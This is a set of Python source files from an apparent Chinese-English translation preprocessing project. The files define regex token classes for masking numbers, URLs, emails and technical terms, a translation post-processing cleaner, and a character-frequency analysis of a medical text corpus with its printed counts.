self.desc = "TTTLink"
self.regex = "(?:(?:ht|f)tps?://[\\w+\\-]+|www\\.)[\\w\\-\\.,@\\?=%&:;/~\\+#]+/?"
assert re.fullmatch(self.regex, "http://dswd.com")
class Email(Rule):
def __init__(self):
super().__init__()
self.desc = "TTTEmail"
self.regex = "[\\w\\-]+@[\\w\\-]+(?:\\.[\\w\\-]+)+"
assert re.fullmatch(self.regex, "<EMAIL>")
class Numeric(Rule):
def __init__(self):
super().__init__()
self.desc = "TTTNumeric"
self.regex = "\\b[0-9][0-9 ]*(\\.[0-9 ]*[0-9]+)?\\b"
assert re.search(self.regex, "ewe 6 0. 9 0%单位")
def process(self, field: Field):
output = pattern_find_pts(self.regex, field.line, flags=re.A.value, mask=field.mask)
mask_update(field.mask, output)
# sub with self.desc
region_tmp = [k for j in sorted([j for i, pti in output.items() for j in pti]) for k in j]
region_tmp = [0] + region_tmp + [len(field.line)]
region = _flatten_region_to_region(region_tmp, strip=False)
output_list = []
for k, region_k in enumerate(region):
if k < len(region) - 1:
output_list.append(field.line[region_k[0]:region_k[1]])
output_list.append(self.desc)
output_list.append(field.line[region[-1][0]:region[-1][1]])
field.line = " ".join(output_list)
return output
class UpperChemical(Numeric):
def __init__(self):
super().__init__()
self.desc = "TTTUpperChemical"
self.regex = "\\b[0-9]*(?:[a-z]*(?:[A-Z]+[a-z]*)+[0-9]+)+[A-Za-z]*\\b|" \
"\\b[A-Za-z]*(?:[0-9]+[a-z]*(?:[A-Z]+[a-z]*)+)+[0-9]*\\b"
assert re.search(self.regex, "ewe DIsH77st单位", re.A)
# TODO: "2-[(4-methyl-2-nitrophenyl)diazenyl]-3-oxo-N-phenyl-butanamide(MNPDOPBA)"
field = Field("http://www.baidu.666.com H1E2 6 0. 9 0%单位988")
Modify.Link().process(field)
Modify.Email().process(field)
Modify.Numeric().process(field)
Modify.UpperChemical().process(field)
class Filter:
pass
class RePattern(object):
@staticmethod
def regex_between_enzh(regex):
return f"\\b{regex}(?=[\\u4e00-\\u9fff]|\\b)|(?<=[\\u4e00-\\u9fff]){regex}(?=[\\u4e00-\\u9fff]|\\b)"
class TokenRegexProcess(object):
regex = " "
@classmethod
def process(cls, sent):
# TODO: SubwordTextEncoder, and the paper with group sub
matcher = re.finditer(cls.regex, sent)
pattern = [0]
for k, m in enumerate(matcher):
pattern.append(m.span())
pattern.append(len(sent))
if len(pattern) >= 2 and pattern[0] == pattern[1]:
pattern.pop(0)
pattern.pop(0)
if len(pattern) >= 2 and pattern[-1] == pattern[-2]:
pattern.pop(-1)
pattern.pop(-1)
return pattern
class TokenSubProcess(object):
level = 1
sub_dict = {" ": " "}
rep = "\\u0000"
@classmethod
def process(cls, sent):
pattern = []
for src_wd, tgt_wd in cls.sub_dict.items():
matcher = re.finditer(re.escape(src_wd), sent)
pattern = []
for k, m in enumerate(matcher):
pattern.append(m.span())
return pattern
class Token(object):
def __init__(self):
self.level_map = {}
self.level_map = self.get_token_level
@property
def get_token_name(self):
# bad
return ["PercentDecimal", "PercentInteger", "NumericDecimal", "NumericInteger", "NumericYear", "TermUpperCase",
"TermCamelCase", "TermEnCharWithNum", "TermChemicalPrefix"]
@property
def get_token_level(self):
if len(self.level_map) == 0:
for token_name in self.get_token_name:
token = getattr(self, token_name)
token_level = token.level
self.level_map[token_name] = token_level
return self.level_map
def set_token_level(self, level_map_part):
for token_name, token_level in level_map_part.items():
self.level_map[token_name] = token_level
class Link(TokenRegexProcess):
regex = "(?:(?:ht|f)tps?://[\w+\-]+|www\.)[\w\-\.,@\?=%&:;/~\+#]+/?"
assert re.search("^" + regex + "$", "http://dswd.com") is not None
class Email(TokenRegexProcess):
regex = "[\w\-]+@[\w\-]+(?:\.[\w\-]+)+"
assert re.search("^" + regex + "$", "<EMAIL>") is not None
class PercentNumeric(TokenRegexProcess):
regex = "(?<=[\\u4000-\\u9fff ])[0-9][0-9 ]*(\.[0-9 ]*[0-9]+)? *[%‰‱]?(?=[\\u4000-\\u9fff ])"
assert re.search(regex, "ewe 6 0. 9 0%单位")
class Numeric(TokenRegexProcess):
regex = "(?<=[\\u4000-\\u9fff ])[0-9][0-9 ]*(\.[0-9 ]*[0-9]+)?(?=[\\u4000-\\u9fff ])"
assert re.search(regex, "ewe 6 0. 9 0单位")
class PercentInteger(TokenRegexProcess):
level = 0.9
"""100%,必须是整数,允许空格"""
regex = "[0-9][0-9 ]* *%"
rep = "PercentInteger"
class NumericDecimal(TokenRegexProcess):
level = 1
"""55.55"""
regex = "[0-9][0-9 ]*\.[0-9 ]*[0-9]"
rep = "NumericDecimal"
class NumericInteger(TokenRegexProcess):
level = 0
"""5"""
regex = "[0-9][0-9 ]*[0-9]|[0-9]"
rep = "NumericInteger"
class NumericYear(TokenRegexProcess):
level = 0.9
"""2009"""
regex = RePattern.regex_between_enzh("1[5-9][0-9]{2}") + '|' + RePattern.regex_between_enzh("20[0-9]{2}")
rep = "NumericYear"
class TermUpperCase(TokenRegexProcess):
level = 0.2
"""DNA"""
regex = RePattern.regex_between_enzh("[A-Z]+")
rep = "TermUpperCase"
class TermCamelCase(TokenRegexProcess):
level = 0.1
"""pH,PubMed, LoL, but not DNA, ID"""
regex = RePattern.regex_between_enzh("[A-Za-z]+[A-Z]+[A-Za-z]*")
rep = "TermCamelCase"
class TermEnCharWithNum(TokenRegexProcess):
level = 0.3
"""EP2"""
regex = RePattern.regex_between_enzh("[0-9]+[A-Za-z]+[0-9A-Za-z]*") + "|" + RePattern.regex_between_enzh(
"[0-9A-Za-z]*[A-Za-z]+[0-9]+")
rep = "TermEnCharWithNum"
class TermChemicalPrefix(TokenRegexProcess):
level = 0.3
"""1,3,7-"""
regex = "(?<![\w\-])([0-9]+ *[,,] *)*[0-9]+\-(?=[A-Za-z\\u4e00-\\u9fff])"
rep = "TermChemicalPrefix"
class RomanNum(TokenSubProcess):
level = 1
"""Ⅱ"""
sub_dict = {" ": " "}
rep = "RomanNum"
class SentTokenInfo(object):
def __init__(self, sent):
self.sent = sent
# self.token_dict = {}
self.level_dict = {}
self.pos_dict = {}
self.filter_piece = []
self.filter_pos_dict = {}
self.result = ""
self.sub_order_dict = []
@staticmethod
def sub_space(targets):
return [re.sub(" ", "", target) for target in targets]
@staticmethod
def max_length_subpiece(piece_level_dict):
"""
pos:[(1,2), (3,4), (1,4)] and level:[2, 2, 1] -> [(1,4)]
pos:[(2,4), (3,5), (5,8)] and level:[1, 2, 1] -> [(3,5), (5,8)]
"""
piece_keys = sorted(piece_level_dict.keys())
if len(piece_keys) == 0:
return []
filter_piece_tmp = []
__ = 0
his_ = 0
for _, i in enumerate(piece_keys):
if (_ <= his_ + __) and (_ > 0):
continue
__ = 0
li = piece_level_dict[i]
tmp = (i, li)
for j in piece_keys:
lj = piece_level_dict[j]
if tmp[0] == j:
pass
elif ((tmp[0][0] < j[0]) and (tmp[0][1] >= j[1])) or ((tmp[0][0] <= j[0]) and (tmp[0][1] > j[1])):
tmp = tmp
__ += 1
elif ((tmp[0][0] >= j[0]) and (tmp[0][1] < j[1])) or ((tmp[0][0] > j[0]) and (tmp[0][1] <= j[1])):
tmp = (j, lj)
__ += 1
elif ((tmp[0][0] > j[0]) and (tmp[0][1] > j[1]) and (tmp[0][0] < j[1])) or (
(tmp[0][0] < j[0]) and (tmp[0][1] < j[1]) and (tmp[0][1] > j[0])):
tmp = tmp if tmp[1] >= lj else (j, lj)
__ += 1
else:
pass
filter_piece_tmp.append(tmp)
his_ = _
filter_piece_tmp = sorted(list(set(filter_piece_tmp)))
filter_piece_tmp = list(zip(*filter_piece_tmp))
return filter_piece_tmp[0]
def execute_token(self, tokens, filter=True):
for token_name in tokens.get_token_name:
tk = getattr(tokens, token_name)
pattern = tk.process(self.sent)
for pos in pattern:
if pos not in self.level_dict or self.level_dict[pos] < tk.level:
self.level_dict[pos] = tk.level
self.pos_dict[pos] = tk.rep
# self.token_dict[tk.rep] = []
if filter:
self.filter_piece = self.max_length_subpiece(self.level_dict)
else:
self.filter_piece = self.level_dict.keys()
for pos in self.filter_piece:
self.filter_pos_dict[pos] = self.pos_dict[pos]
# self.token_dict[self.pos_dict[pos]].append(re.sub(" ", "", self.sent[pos[0]:pos[1]]))
return self.filter_pos_dict # self.token_dict
@property
def sub_token(self):
if self.result:
return self.result
else:
piece_keys = sorted(self.filter_pos_dict.keys())
ppp = [0] + [i for p in piece_keys for i in p] + [len(self.sent)]
ppp = [(ppp[2 * i], ppp[2 * i + 1]) for i in range(len(ppp) // 2)]
result_ = [self.sent[ppp[0][0]:ppp[0][1]]]
for k, p in enumerate(piece_keys):
result_.append(self.filter_pos_dict[piece_keys[k]])
result_.append(self.sent[ppp[k + 1][0]:ppp[k + 1][1]])
# TODO: how to get the border of words? here we can use " ".join(result_)
# any better idea?
self.result = " ".join(result_)
self.sub_order_dict = [(self.filter_pos_dict[pos], self.sent[pos[0]:pos[1]]) for pos in piece_keys]
return self.result
def sub_sent(sent, sub_order_dict):
for rep, target in sub_order_dict:
m = re.search(rep, sent)
sent = sent[:m.start()] + target + sent[m.end():] if m is not None else sent
return sent
def decode_sent(sents, sents_dict):
bad_sents = []
decode = []
for k, (sent, sub_dict) in enumerate(zip(sents, sents_dict)):
try:
if len(sub_dict) > 0:
decode.append(sub_sent(sent, sub_dict))
else:
decode.append(sent)
except Exception as e:
bad_sents.append([sent, sub_dict])
decode.append(sent)
return decode, bad_sents
```
#### File: t2t-learning/processutils/analyze.py
```python
import re
from processutils.regexutils import pattern_sub_pts
from processutils.regexutils import pattern_find_pts
from processutils.regexutils import mask_update
class RePattern(object):
@staticmethod
def regex_between_enzh(regex):
return f"\\b{regex}(?=[\\u4e00-\\u9fff]|\\b)|(?<=[\\u4e00-\\u9fff]){regex}(?=[\\u4e00-\\u9fff]|\\b)"
class TokenRegexProcess(object):
level = 1
regex = " "
rep = "\\uf000"
@classmethod
def process(cls, sent):
# TODO: SubwordTextEncoder, and the paper with group sub
matcher = re.finditer(cls.regex, sent)
pattern = []
for k, m in enumerate(matcher):
pattern.append(m.span())
return pattern
class TokenSubProcess(object):
level = 1
sub_dict = {" ": " "}
rep = "\\uf000"
@classmethod
def process(cls, sent):
pattern = []
for src_wd, tgt_wd in cls.sub_dict.items():
matcher = re.finditer(re.escape(src_wd), sent)
pattern = []
for k, m in enumerate(matcher):
pattern.append(m.span())
return pattern
class Token(object):
def __init__(self):
self.level_map = {}
self.level_map = self.get_token_level
@property
def get_token_name(self):
# bad
return ["PercentDecimal", "PercentInteger", "NumericDecimal", "NumericInteger", "NumericYear", "TermUpperCase",
"TermCamelCase", "TermEnCharWithNum", "TermChemicalPrefix"]
@property
def get_token_level(self):
if len(self.level_map) == 0:
for token_name in self.get_token_name:
token = getattr(self, token_name)
token_level = token.level
self.level_map[token_name] = token_level
return self.level_map
def set_token_level(self, level_map_part):
for token_name, token_level in level_map_part.items():
self.level_map[token_name] = token_level
class PercentDecimal(TokenRegexProcess):
level = 1
"""55.55%,必须是小数,允许空格"""
regex = "[0-9][0-9 ]*\.[0-9 ]*[0-9] *%"
rep = "PercentDecimal"
class PercentInteger(TokenRegexProcess):
level = 0.9
"""100%,必须是整数,允许空格"""
regex = "[0-9][0-9 ]* *%"
rep = "PercentInteger"
class NumericDecimal(TokenRegexProcess):
level = 1
"""55.55"""
regex = "[0-9][0-9 ]*\.[0-9 ]*[0-9]"
rep = "NumericDecimal"
class NumericInteger(TokenRegexProcess):
level = 0
"""5"""
regex = "[0-9][0-9 ]*[0-9]|[0-9]"
rep = "NumericInteger"
class NumericYear(TokenRegexProcess):
level = 0.9
"""2009"""
regex = RePattern.regex_between_enzh("1[5-9][0-9]{2}") + '|' + RePattern.regex_between_enzh("20[0-9]{2}")
rep = "NumericYear"
class TermUpperCase(TokenRegexProcess):
level = 0.2
"""DNA"""
regex = RePattern.regex_between_enzh("[A-Z]+")
rep = "TermUpperCase"
class TermCamelCase(TokenRegexProcess):
level = 0.1
"""pH,PubMed, LoL, but not DNA, ID"""
regex = RePattern.regex_between_enzh("[A-Za-z]+[A-Z]+[A-Za-z]*")
rep = "TermCamelCase"
class TermEnCharWithNum(TokenRegexProcess):
level = 0.3
"""EP2"""
regex = RePattern.regex_between_enzh("[0-9]*(?:[a-z]*[A-Z]+[a-z]*[0-9]+)+[A-Za-z]*") + "|" + \
RePattern.regex_between_enzh("[A-Za-z]*(?:[0-9]+[a-z]*[A-Z]+[a-z]*)+[0-9]*")
rep = "TermEnCharWithNum"
class TermChemicalPrefix(TokenRegexProcess):
level = 0.3
"""1,3,7-"""
regex = "(?<![\w\-])([0-9]+ *[,,] *)*[0-9]+\-(?=[A-Za-z\\u4e00-\\u9fff])"
rep = "TermChemicalPrefix"
class RomanNum(TokenSubProcess):
level = 1
"""Ⅱ"""
sub_dict = {" ": " "}
rep = "RomanNum"
class SentTokenInfo(object):
def __init__(self, sent):
self.sent = sent
# self.token_dict = {}
self.level_dict = {}
self.pos_dict = {}
self.filter_piece = []
self.filter_pos_dict = {}
self.result = ""
self.sub_order_dict = []
@staticmethod
def sub_space(targets):
return [re.sub(" ", "", target) for target in targets]
@staticmethod
def max_length_subpiece(piece_level_dict):
"""
pos:[(1,2), (3,4), (1,4)] and level:[2, 2, 1] -> [(1,4)]
pos:[(2,4), (3,5), (5,8)] and level:[1, 2, 1] -> [(3,5), (5,8)]
"""
piece_keys = sorted(piece_level_dict.keys())
if len(piece_keys) == 0:
return []
filter_piece_tmp = []
__ = 0
his_ = 0
for _, i in enumerate(piece_keys):
if (_ <= his_ + __) and (_ > 0):
continue
__ = 0
li = piece_level_dict[i]
tmp = (i, li)
for j in piece_keys:
lj = piece_level_dict[j]
if tmp[0] == j:
pass
elif ((tmp[0][0] < j[0]) and (tmp[0][1] >= j[1])) or ((tmp[0][0] <= j[0]) and (tmp[0][1] > j[1])):
tmp = tmp
__ += 1
elif ((tmp[0][0] >= j[0]) and (tmp[0][1] < j[1])) or ((tmp[0][0] > j[0]) and (tmp[0][1] <= j[1])):
tmp = (j, lj)
__ += 1
elif ((tmp[0][0] > j[0]) and (tmp[0][1] > j[1]) and (tmp[0][0] < j[1])) or (
(tmp[0][0] < j[0]) and (tmp[0][1] < j[1]) and (tmp[0][1] > j[0])):
tmp = tmp if tmp[1] >= lj else (j, lj)
__ += 1
else:
pass
filter_piece_tmp.append(tmp)
his_ = _
filter_piece_tmp = sorted(list(set(filter_piece_tmp)))
filter_piece_tmp = list(zip(*filter_piece_tmp))
return filter_piece_tmp[0]
def execute_token(self, tokens, filter=True):
for token_name in tokens.get_token_name:
tk = getattr(tokens, token_name)
pattern = tk.process(self.sent)
for pos in pattern:
if pos not in self.level_dict or self.level_dict[pos] < tk.level:
self.level_dict[pos] = tk.level
self.pos_dict[pos] = tk.rep
# self.token_dict[tk.rep] = []
if filter:
self.filter_piece = self.max_length_subpiece(self.level_dict)
else:
self.filter_piece = self.level_dict.keys()
for pos in self.filter_piece:
self.filter_pos_dict[pos] = self.pos_dict[pos]
# self.token_dict[self.pos_dict[pos]].append(re.sub(" ", "", self.sent[pos[0]:pos[1]]))
return self.filter_pos_dict # self.token_dict
@property
def sub_token(self):
if self.result:
return self.result
else:
piece_keys = sorted(self.filter_pos_dict.keys())
ppp = [0] + [i for p in piece_keys for i in p] + [len(self.sent)]
ppp = [(ppp[2 * i], ppp[2 * i + 1]) for i in range(len(ppp) // 2)]
result_ = [self.sent[ppp[0][0]:ppp[0][1]]]
for k, p in enumerate(piece_keys):
result_.append(self.filter_pos_dict[piece_keys[k]])
result_.append(self.sent[ppp[k + 1][0]:ppp[k + 1][1]])
# TODO: how to get the border of words? here we can use " ".join(result_)
# any better idea?
self.result = " ".join(result_)
self.sub_order_dict = [(self.filter_pos_dict[pos], self.sent[pos[0]:pos[1]].replace(" ", "")) for pos in
piece_keys]
return self.result
def sub_sent(sent, sub_order_dict):
for rep, target in sub_order_dict:
m = re.search(rep, sent)
sent = sent[:m.start()] + target + sent[m.end():] if m is not None else sent
return sent
def decode_sent(sents, sents_dict):
bad_sents = []
decode = []
for k, (sent, sub_dict) in enumerate(zip(sents, sents_dict)):
try:
if len(sub_dict) > 0:
decode.append(sub_sent(sent, sub_dict))
else:
decode.append(sent)
except Exception as e:
bad_sents.append([sent, sub_dict])
decode.append(sent)
return decode, bad_sents
def translate_afterprocess(line):
line = re.sub(" +([,.?!:;'’”})\\]、,。?!:;)】》])", "\\1", line)
line = re.sub("([,.?!:;'’”})\\]] |[、,。?!:;)】》]) +", "\\1", line)
line = re.sub("([‘“{(\\[(【《]) +", "\\1", line)
line = re.sub(" +( [‘“{(\\[]|[(【《])", "\\1", line)
mask = [0] * len(line)
# \\b[A-Z]\\. [a-z]+\\b froom corpus
case_store = ["e. g.", "i. e.", "E. coli", "S. aureus", "O. aureus", "C. indicum", "C. funicola", "M. pusillum"]
case_regex = "|".join([re.escape(c) for c in case_store])
case_mask = pattern_find_pts(case_regex, line, mask=mask)
mask_update(mask, case_mask)
def upper_after_endmark(m):
pattern = m.group(0)
if len(pattern) == 1 and pattern.islower():
return pattern.upper()
else:
return pattern
line = pattern_sub_pts("(?<=[.?!;] )[a-z]|(?<=[。?!;])[a-z]|(?<=^)[a-z]", upper_after_endmark, line, mask=mask)
line = re.sub("(?<=[\\u4e00-\\u9fff]) +(?=[\\u4e00-\\u9fff])|"
"(?<=[\\u4e00-\\u9fff]) +(?=\\w)|"
"(?<=[\\w]) +(?=[\\u4e00-\\u9fff])", "", line)
line = re.sub(" *([+±=*/<>≤≥_~′″]) *", "\\1", line)
line = re.sub("(?<!,) *\\- *", "-", line)
return line
def decode_afterprocess(sents):
return [translate_afterprocess(sent) for sent in sents]
```
#### File: t2t-learning/qa/char_analyze.py
```python
from collections import Counter
import qa.regex_utils as regutil
import re
resource_path = "/media/tmxmall/a36811aa-0e87-4ba1-b14f-370134452449/data/medicine.txt"
with open(resource_path, "r", encoding="utf8") as f:
char_stream = f.read()
char_dictionary = Counter(list(char_stream))
med_unicodes = regutil.expr_converter("[[%s]]" % "".join(char_dictionary.keys()).replace("\n", "") + "#[[\\u4e00-\\u9fff]]")
format_med_unicodes = re.sub("(?<!-)(?=\\\\u)", "\n", med_unicodes)
print(format_med_unicodes)
lines = char_stream.split("\n")
unknown_char = "[^\\u0020-\\u007e\\u4e00-\\u9fff]"
def regex_filter_line(regex, lines):
filter_sentence = list(filter(lambda x: re.search(regex, x) is not None, lines))
print("%20s" % regex, len(filter_sentence))
return len(filter_sentence)
regutil.uu_enum("\\u0020-\\u007e")
regex_filter_line("[\\u0020-\\u007e]", lines)
regex_filter_line("[\\u00a0-\\u00ff]", lines)
regex_filter_line("[\\u0100-\\u01ff]", lines)
regex_filter_line("[\\u0251]", lines)
regex_filter_line("[\\u025b]", lines)
regex_filter_line("[\\u0261]", lines)
regex_filter_line("[\\u028a]", lines)
regex_filter_line("[\\u02c6-\\u02cb]", lines)
regex_filter_line("[\\u02d0]", lines)
regex_filter_line("[\\u02d8-\\u02da]", lines)
regex_filter_line("[\\u02dc]", lines)
regex_filter_line("[\\u037a]", lines)
regex_filter_line("[\\u037e]", lines)
regex_filter_line("[\\u038a]", lines)
regex_filter_line("[\\u038c]", lines)
regex_filter_line("[\\u03cb]", lines)
regex_filter_line("[\\u03d6]", lines)
regex_filter_line("[\\u0384-\\u0385]", lines)
regex_filter_line("[\\u0387-\\u0388]", lines)
regex_filter_line("[\\u038e-\\u038f]", lines)
regex_filter_line("[\\u0391-\\u03c9]", lines)
regex_filter_line("[\\u0400-\\u04ff]", lines)
regex_filter_line("[\\u0590-\\u05ff]", lines)
regex_filter_line("[\\u0652]", lines)
regex_filter_line("[\\u11bc]", lines)
regex_filter_line("[\\u1868]", lines)
regex_filter_line("[\\u1d31]", lines)
regex_filter_line("[\\u1d52]", lines)
regex_filter_line("[\\u1d5b]", lines)
regex_filter_line("[\\u1ef7]", lines)
regex_filter_line("[\\u2016-\\u206a]", lines)
regex_filter_line("[\\u2070]", lines)
regex_filter_line("[\\u2074-\\u2075]", lines)
regex_filter_line("[\\u2077-\\u2078]", lines)
regex_filter_line("[\\u2082-\\u2084]", lines)
regex_filter_line("[\\u20ac]", lines)
regex_filter_line("[\\u2103]", lines)
regex_filter_line("[\\u2105]", lines)
regex_filter_line("[\\u2109]", lines)
regex_filter_line("[\\u2116]", lines)
regex_filter_line("[\\u2122]", lines)
regex_filter_line("[\\u212b]", lines)
regex_filter_line("[\\u2160-\\u216b]", lines)
regex_filter_line("[\\u2170-\\u2179]", lines)
regex_filter_line("[\\u21d2]", lines)
regex_filter_line("[\\u2190-\\u2193]", lines)
regex_filter_line("[\\u2206]", lines)
regex_filter_line("[\\u2208]", lines)
regex_filter_line("[\\u2211-\\u2212]", lines)
regex_filter_line("[\\u2217-\\u221a]", lines)
regex_filter_line("[\\u221d-\\u2220]", lines)
regex_filter_line("[\\u2223]", lines)
regex_filter_line("[\\u2225]", lines)
regex_filter_line("[\\u2227-\\u222b]", lines)
regex_filter_line("[\\u222e]", lines)
regex_filter_line("[\\u2234]", lines)
regex_filter_line("[\\u2237]", lines)
regex_filter_line("[\\u223c-\\u223d]", lines)
regex_filter_line("[\\u2245]", lines)
regex_filter_line("[\\u224c]", lines)
regex_filter_line("[\\u2252]", lines)
regex_filter_line("[\\u2260-\\u2261]", lines)
regex_filter_line("[\\u2264-\\u2267]", lines)
regex_filter_line("[\\u226f]", lines)
regex_filter_line("[\\u2295]", lines)
regex_filter_line("[\\u2299]", lines)
regex_filter_line("[\\u22a5]", lines)
regex_filter_line("[\\u22bf]", lines)
regex_filter_line("[\\u2312]", lines)
regex_filter_line("[\\u2395]", lines)
regex_filter_line("[\\u2460-\\u2473]", lines)
regex_filter_line("[\\u2474-\\u2487]", lines)
regex_filter_line("[\\u2488-\\u249b]", lines)
regex_filter_line("[\\u2500-\\u257f]", lines)
regex_filter_line("[\\u25a0-\\u25a1]", lines)
regex_filter_line("[\\u25b2-\\u25b4]", lines)
regex_filter_line("[\\u25c6-\\u25c7]", lines)
regex_filter_line("[\\u25ca-\\u25cb]", lines)
regex_filter_line("[\\u25ce-\\u25cf]", lines)
regex_filter_line("[\\u2605-\\u2606]", lines)
regex_filter_line("[\\u2609]", lines)
regex_filter_line("[\\u2610]", lines)
regex_filter_line("[\\u2640]", lines)
regex_filter_line("[\\u2642]", lines)
regex_filter_line("[\\u2666]", lines)
regex_filter_line("[\\u266a-\\u266b]", lines)
regex_filter_line("[\\u2714]", lines)
regex_filter_line("[\\u2717]", lines)
regex_filter_line("[\\u274f]", lines)
regex_filter_line("[\\u2751]", lines)
regex_filter_line("[\\u279f]", lines)
regex_filter_line("[\\u27a2]", lines)
regex_filter_line("[\\u27a5]", lines)
regex_filter_line("[\\u2a7d]", lines)
regex_filter_line("[\\u2fd4]", lines)
regex_filter_line("[\\u3001-\\u301e]", lines)
regex_filter_line("[\\u3022-\\u3025]", lines)
regex_filter_line("[\\u3105-\\u3107]", lines)
regex_filter_line("[\\u310a]", lines)
regex_filter_line("[\\u3111]", lines)
regex_filter_line("[\\u3113]", lines)
regex_filter_line("[\\u3116-\\u3117]", lines)
regex_filter_line("[\\u311a-\\u311b]", lines)
regex_filter_line("[\\u3122]", lines)
regex_filter_line("[\\u3125]", lines)
regex_filter_line("[\\u3127-\\u3128]", lines)
regex_filter_line("[\\u3220-\\u3229]", lines)
regex_filter_line("[\\u32a3]", lines)
regex_filter_line("[\\u338e-\\u338f]", lines)
regex_filter_line("[\\u339c-\\u339d]", lines)
regex_filter_line("[\\u33a1]", lines)
regex_filter_line("[\\u33a5]", lines)
regex_filter_line("[\\u33d5]", lines)
regex_filter_line("[\\u33d1-\\u33d2]", lines)
regex_filter_line("[\\u359e]", lines)
regex_filter_line("[\\u39d1]", lines)
regex_filter_line("[\\u41f2]", lines)
regex_filter_line("[\\u4341]", lines)
regex_filter_line("[\\u4d13]", lines)
regex_filter_line("[\\u4d15]", lines)
regex_filter_line("[\\u4e00-\\u9fff]", lines)
regex_filter_line("[\\uacf3]", lines)
regex_filter_line("[\\ucd38]", lines)
regex_filter_line("[\\ue20c-\\ue2ff]", lines)
regex_filter_line("[\\uf900-\\ufaff]", lines)
regex_filter_line("[\\ufb03]", lines)
regex_filter_line("[\\ufe30-\\ufe31]", lines)
regex_filter_line("[\\ufe33]", lines)
regex_filter_line("[\\ufe38]", lines)
regex_filter_line("[\\ufe3c-\\ufe3d]", lines)
regex_filter_line("[\\ufe3f-\\ufe41]", lines)
regex_filter_line("[\\ufe4d-\\ufe4e]", lines)
regex_filter_line("[\\ufe55-\\ufe57]", lines)
regex_filter_line("[\\ufe59-\\ufe5c]", lines)
regex_filter_line("[\\ufe5f]", lines)
regex_filter_line("[\\ufe63]", lines)
regex_filter_line("[\\ufe65-\\ufe66]", lines)
regex_filter_line("[\\ufe6a-\\ufe6b]", lines)
regex_filter_line("[\\ufeff]", lines)
regex_filter_line("[\\uff01]", lines)
regex_filter_line("[\\uff08-\\uff09]", lines)
regex_filter_line("[\\uff0c]", lines)
regex_filter_line("[\\uff1a]", lines)
regex_filter_line("[\\uff1f]", lines)
regex_filter_line("[\\uff61]", lines)
regex_filter_line("[\\uff63]", lines)
regex_filter_line("[\\uff65]", lines)
regex_filter_line("[\\uff6c]", lines)
regex_filter_line("[\\uff72]", lines)
regex_filter_line("[\\uff86]", lines)
regex_filter_line("[\\uff89]", lines)
regex_filter_line("[\\uffe0-\\uffe1]", lines)
regex_filter_line("[\\uffe3]", lines)
regex_filter_line("[\\uffe5]", lines)
regex_filter_line("[\\uffed]", lines)
regex_filter_line("[\\ufffc]", lines)
"""
[\u0020-\u007e] 13056272 \\u0020-\\u007e Latin
[\u00a0-\u00ff] 258619 \\u00a0-\\u00ff Latin ++
[\u0100-\u01ff] 353 \\u0100-\\u01ff Latin ++
[\u0251] 302 \\u0251 ɑ
[\u025b] 2 \\u025b ɛ
[\u0261] 25 \\u0261 ɡ
[\u028a] 1 \\u028a ʊ
[\u02c6-\u02cb] 870 \\u02c6-\\u02cb ˆˇˈˉˊˋ
[\u02d0] 1 \\u02d0 ː
[\u02d8-\u02da] 25 \\u02d8-\\u02da ˘˙˚
[\u02dc] 10 \\u02dc ˜
[\u037a] 1 \\u037a ͺ
[\u037e] 4 \\u037e ;
[\u038a] 3 \\u038a Ί
[\u038c] 1 \\u038c Ό
[\u03cb] 3 \\u03cb ϋ
[\u03d6] 2 \\u03d6 ϖ
[\u0384-\u0385] 8 \\u0384-\\u0385 ΄΅
[\u0387-\u0388] 2 \\u0387-\\u0388 ·Έ
[\u038e-\u038f] 2 \\u038e-\\u038f ΎΏ
[\u0391-\u03c9] 567276 \\u0391-\\u03c9 希腊
[\u0400-\u04ff] 2058 \\u0400-\\u04ff 西里尔
[\u0590-\u05ff] 34 \\u0590-\\u05ff 希伯来
[\u0652] 1 \\u0652 阿拉伯
[\u11bc] 3 \\u11bc 朝鲜
[\u1868] 1 \\u1868 ᡨ 蒙古
[\u1d31] 1 \\u1d31 ᴱ
[\u1d52] 1 \\u1d52 ᵒ
[\u1d5b] 1 \\u1d5b ᵛ
[\u1ef7] 1 \\u1ef7 ỷ Latin ++
[\u2016-\u206a] 323353 \\u2016-\\u206a punc++
[\u2070] 4 \\u2070 ⁰
[\u2074-\u2075] 9 \\u2074-\\u2075 ⁴⁵
[\u2077-\u2078] 11 \\u2077-\\u2078 ⁷⁸
[\u2082-\u2084] 13 \\u2082-\\u2084 ₂₃₄
[\u20ac] 58 \\u20ac €
[\u2103] 132218 \\u2103 ℃
[\u2105] 64 \\u2105 ℅
[\u2109] 45 \\u2109 ℉
[\u2116] 559 \\u2116 №
[\u2122] 348 \\u2122 ™
[\u212b] 5 \\u212b Å
[\u2160-\u216b] 235239 \\u2160-\\u216b ⅠⅡⅢⅣⅤⅥⅦⅧⅨⅩⅪⅫ
[\u2170-\u2179] 1557 \\u2170-\\u2179 ⅰⅱⅲⅳⅴⅵⅶⅷⅸ
[\u21d2] 3 \\u21d2 ⇒
[\u2190-\u2193] 15107 \\u2190-\\u2193 ←↑→↓
[\u2206] 5 \\u2206 ∆
[\u2208] 281 \\u2208 ∈
[\u2211-\u2212] 839 \\u2211-\\u2212 ∑−
[\u2217-\u221a] 75 \\u2217-\\u221a ∗∘∙√
[\u221d-\u2220] 861 \\u221d-\\u2220 ∝∞∟∠
[\u2223] 1 \\u2223 ∣
[\u2225] 80 \\u2225 ∥
[\u2227-\u222b] 226 \\u2227-\\u222b ∧∨∩∪∫
[\u222e] 8 \\u222e ∮
[\u2234] 46 \\u2234 ∴
[\u2237] 333 \\u2237 ∷
[\u223c-\u223d] 29 \\u223c-\\u223d ∼∽
[\u2245] 1 \\u2245 ≅
[\u224c] 33 \\u224c ≌
[\u2252] 4 \\u2252 ≒
[\u2260-\u2261] 555 \\u2260-\\u2261 ≠≡
[\u2264-\u2267] 31397 \\u2264-\\u2267 ≤≥≦≧
[\u226f] 3 \\u226f ≯
[\u2295] 4 \\u2295 ⊕
[\u2299] 17 \\u2299 ⊙
[\u22a5] 41 \\u22a5 ⊥
[\u22bf] 116 \\u22bf ⊿
[\u2312] 5 \\u2312 ⌒
[\u2395] 4 \\u2395 ⎕
[\u2460-\u2473] 48470 \\u2460-\\u2473 ①②③④⑤⑥⑦⑧⑨⑩ ⑳
[\u2474-\u2487] 1267 \\u2474-\\u2487 ⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽ ⒇
[\u2488-\u249b] 107 \\u2488-\\u249b ⒈⒉⒊⒋⒌⒍⒎⒏⒐⒑ ⒛
[\u2500-\u257f] 566 \\u2500-\\u257f ─━│┃┄┅┆┇┈┉┊
[\u25a0-\u25a1] 1052 \\u25a0-\\u25a1 ■□
